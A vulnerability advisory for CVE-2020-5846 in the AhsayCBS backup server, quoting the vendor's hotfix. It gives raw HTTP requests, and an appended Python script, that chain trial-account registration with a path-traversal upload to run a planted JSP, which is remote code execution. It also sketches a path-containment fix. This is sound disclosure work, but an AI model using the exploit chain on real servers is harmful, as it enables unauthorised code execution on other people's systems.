Ahsay Cloud Backup - part 2

AhsayCBS is a server component installed on a physical server or virtual machine. It comes with a web-based central management console that lets system administrators manage the whole backup system, as well as all AhsayOBM / AhsayACB backup users and their backup data, through any web browser. Users can also log in to the User Web Console to manage backup sets, perform backups and restores, and monitor live activities.

Users' backup data can be hosted on AhsayCBS internal storage, on an FTP / SFTP server, or on cloud storage (e.g. Amazon S3, Google Cloud Storage, Microsoft Azure, etc.).



CVE-2020-5846 - File Upload

Advisory

Ahsay has released an unofficial hotfix. Their reply is quoted below.

Hi,

Just to let you know that our development team has released the unofficial hotfix for the vulnerability issue.

However, as the hotfix is based on CBS v8.3.0.30, please upgrade your CBS to v8.3.0.30 first by following:

FAQ: How to install the latest patch set for AhsayCBS? (5145)

http://wiki.ahsay.com/doku.php?id=public:8009_faq:how_to_install_the_latest_patch_set_for_ahsaycbs
Note: Before you deploy the patch to your CBS, make sure you have made a copy of your application folder before making any change.

After that, you can apply the unofficial hotfix to the updated CBS server. It can be downloaded from the links below:

For Windows:
http://download.ahsay.com/dev/hot-fixes/83/830122/cbs-win-hotfix-task26000.zip

For NIX:
http://download.ahsay.com/dev/hot-fixes/83/830122/cbs-nix-hotfix-task26000.zip

Please apply it by the following steps onto the CBS:
1. Stop CBS service
2. Make a copy of the folder "$CBS_HOME/lib" or "$CBS_HOME\lib" for safety purposes
3. Extract the contents of the hotfix file to "$CBS_HOME/lib" or "$CBS_HOME\lib" (overwrite existing)
4. Restart CBS service

The fix will be included in our next official release.

Technical details

To exploit this vulnerability we need to create a trial account or have valid credentials for an existing backup user. By default trial account creation is enabled. We can verify whether a system has trial accounts enabled with the following POST request to the server (no authentication is required for this check):

POST /obs/obm7/user/isTrialEnabled HTTP/1.1
Host: 172.16.238.175
Connection: close
Content-Length: 0
        

If the server replies with "ENABLED" we can create a trial account. Any other reply means self-registration is switched off, and the remaining steps need credentials of an existing backup user instead.

To create the trial account we base64-encode the chosen username and password and place them in the headers of the POST request, as below (the values shown decode to the username gzSsZg2a and the password zXuBkQSn01570^):

POST /obs/obm7/user/addTrialUser HTTP/1.1
Host: 172.16.238.175
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-RSW-custom-encode-username: Z3pTc1pnMmE=
X-RSW-custom-encode-password: elh1QmtRU24wMTU3MF4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
        

If the account is created successfully the server responds with "HTTP/1.1 200 OK". The same credentials are then accepted by the upload endpoint.

Now for the upload part. Any authenticated backup user can upload a file of arbitrary content to any location on the server that the account running the AhsayCBS service can write to: the destination path comes from a client-supplied header, and the "../" sequences in it are not stripped, so the file is not confined to the user's own storage area.

For this to work we need to set the following headers, with every value base64-encoded: the username and password go in X-RSW-Request-0 and X-RSW-Request-1, and the destination path goes in X-RSW-custom-encode-path. The path used here decodes to ../../webapps/cbs/help/en/hello_world.jsp, which traverses out of the user's storage directory and into the help directory of the CBS web application, where the server will treat the file as a JSP page.

Below is the full PUT request to upload the file:

PUT /obs/obm7/file/upload HTTP/1.1
Host: 172.16.238.175
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-RSW-Request-0: Z3pTc1pnMmE=
X-RSW-Request-1: elh1QmtRU24wMTU3MF4=
X-RSW-custom-encode-path: Li4vLi4vd2ViYXBwcy9jYnMvaGVscC9lbi9oZWxsb193b3JsZC5qc3A=
Content-Length: 98
Connection: close

<%= "Hello World!" %>

The server should respond with "HTTP/1.1 201 Created". Because the file landed inside the web application, it can be requested in a browser: https://172.16.238.175/cbs/help/en/hello_world.jsp returns "Hello World!", i.e. the JSP expression was compiled and evaluated by the server. A JSP of the attacker's choosing therefore runs with the privileges of the AhsayCBS service account, so the three requests above (check trial status, register a trial user, PUT a JSP under webapps) go from unauthenticated access to remote code execution.
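The chain above as a small Python script, added here as an example and not code from the original write-up or from Ahsay. It builds the three requests exactly as the page shows them (base64-encoded credentials and path in the X-RSW-* headers), decodes the path header so you can see what the server receives, and adds the path-containment check that the vulnerable handler lacks. The upload root "/opt/cbs/user/<name>/files", the send() helper and the hardening function are assumptions for illustration; they are not Ahsay's directory layout or hotfix. Nothing is sent at import time; send() is only called from the __main__ block against a lab host you control.

```python
"""CVE-2020-5846 request construction and the missing path check (stdlib only)."""
import base64
import http.client
import posixpath
import ssl

HOST = "172.16.238.175"  # target from the write-up; point at your own lab host


def b64(value: str) -> str:
    """AhsayCBS expects header values base64-encoded (X-RSW-custom-encode-*, X-RSW-Request-*)."""
    return base64.b64encode(value.encode()).decode()


def trial_enabled_request():
    """Step 1: unauthenticated POST; the server answers ENABLED when self-registration is on."""
    return ("POST", "/obs/obm7/user/isTrialEnabled", {"Content-Length": "0"}, b"")


def add_trial_user_request(username: str, password: str):
    """Step 2: credentials travel base64-encoded in custom headers, the body stays empty."""
    headers = {
        "X-RSW-custom-encode-username": b64(username),
        "X-RSW-custom-encode-password": b64(password),
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": "0",
    }
    return ("POST", "/obs/obm7/user/addTrialUser", headers, b"")


def upload_request(username: str, password: str, target_path: str, body: bytes):
    """Step 3: PUT with the same credentials in X-RSW-Request-0/1 and the destination
    path, base64-encoded, in X-RSW-custom-encode-path. The '../' in target_path is what
    escapes the user's storage directory on an unpatched server."""
    headers = {
        "X-RSW-Request-0": b64(username),
        "X-RSW-Request-1": b64(password),
        "X-RSW-custom-encode-path": b64(target_path),
        "Content-Length": str(len(body)),
    }
    return ("PUT", "/obs/obm7/file/upload", headers, body)


def decode_path_header(value: str) -> str:
    """What the server sees after decoding X-RSW-custom-encode-path."""
    return base64.b64decode(value).decode()


def path_escapes_root(upload_root: str, client_path: str) -> bool:
    """Hypothetical hardening (not Ahsay's hotfix): join the client path onto the
    per-user root, normalise away '.' and '..', and reject anything that does not
    stay below the root. Absolute client paths are rejected too, because
    posixpath.join discards the root when the second argument starts with '/'."""
    root = posixpath.normpath(upload_root) + "/"
    full = posixpath.normpath(posixpath.join(upload_root, client_path))
    return not full.startswith(root)


def send(method, path, headers, body=b"", host=HOST, use_tls=True):
    """Fire one request tuple at the lab host and return (status, response body)."""
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # lab boxes use self-signed certs
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, timeout=10, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, timeout=10)
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


if __name__ == "__main__":
    user, pw = "gzSsZg2a", "zXuBkQSn01570^"          # credentials from the write-up
    jsp = b'<%= "Hello World!" %>'                   # harmless proof of JSP execution
    traversal = "../../webapps/cbs/help/en/hello_world.jsp"

    steps = [trial_enabled_request(),
             add_trial_user_request(user, pw),
             upload_request(user, pw, traversal, jsp)]
    for method, path, headers, body in steps:
        print(method, path)
        for k, v in headers.items():
            print(f"  {k}: {v}")
        # uncomment to run against a lab host:
        # print(send(method, path, headers, body))

    hdr = steps[2][2]["X-RSW-custom-encode-path"]
    print("server decodes path to:", decode_path_header(hdr))
    print("hardened check rejects it:", path_escapes_root("/opt/cbs/user/gzSsZg2a/files", traversal))
```

Running it without the send() line prints the three requests in the same shape as the captures above, followed by the decoded traversal path and True from the containment check; a server that applied such a check would answer the PUT with an error instead of 201 Created.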